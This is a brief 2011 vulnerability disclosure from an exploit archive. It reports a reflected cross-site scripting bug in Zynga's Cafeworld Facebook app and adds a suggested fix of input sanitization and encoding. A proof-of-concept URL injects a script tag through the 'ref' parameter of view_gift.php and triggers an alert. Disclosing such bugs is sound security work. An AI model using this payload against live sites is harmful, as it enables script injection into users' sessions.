Home / exploits Zynga Cafeworld Cross Site Scripting
Posted on 30 August 2011
_______ ________________ __ _____________ _______ _ _ \______ | _/_ \______ __ _ __ \_ __ / /_ / /_ / / |/ /| | / / ______ / / / | | / \_/ \_/ / /| < | | / / /_____/ / |__| \_____ /\_____ /____/ |__|_ |___| /____/ /\_/ / / / ------------------------------------------------------------------------------------------------------------------------------------------------- TITLE: Type-0 XSS bug in CAFEWORLD(facebook apps) vendor: www.apps.facebook.com/cafeworld/**[] Author: r007k17-w a.k.a Raghavendra Karthik.D Email: n4gb07@gmail.com My blog: http://shadowrootkit.wordpress.com/ Google Dork: Copyright 2010 Zynga Game Network Inc ----------------------------------------------------------------------------------------------------------------------------------------------------------------- DEMO: http://apps.facebook.com/cafeworld/view_gift.php?ref="><script>alert("r007k17-w")</script> SUG: HTML encoding, escaping special characters,Input sanitization. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- gr33t1ngs to s1d3-3ff3cts and all my friends
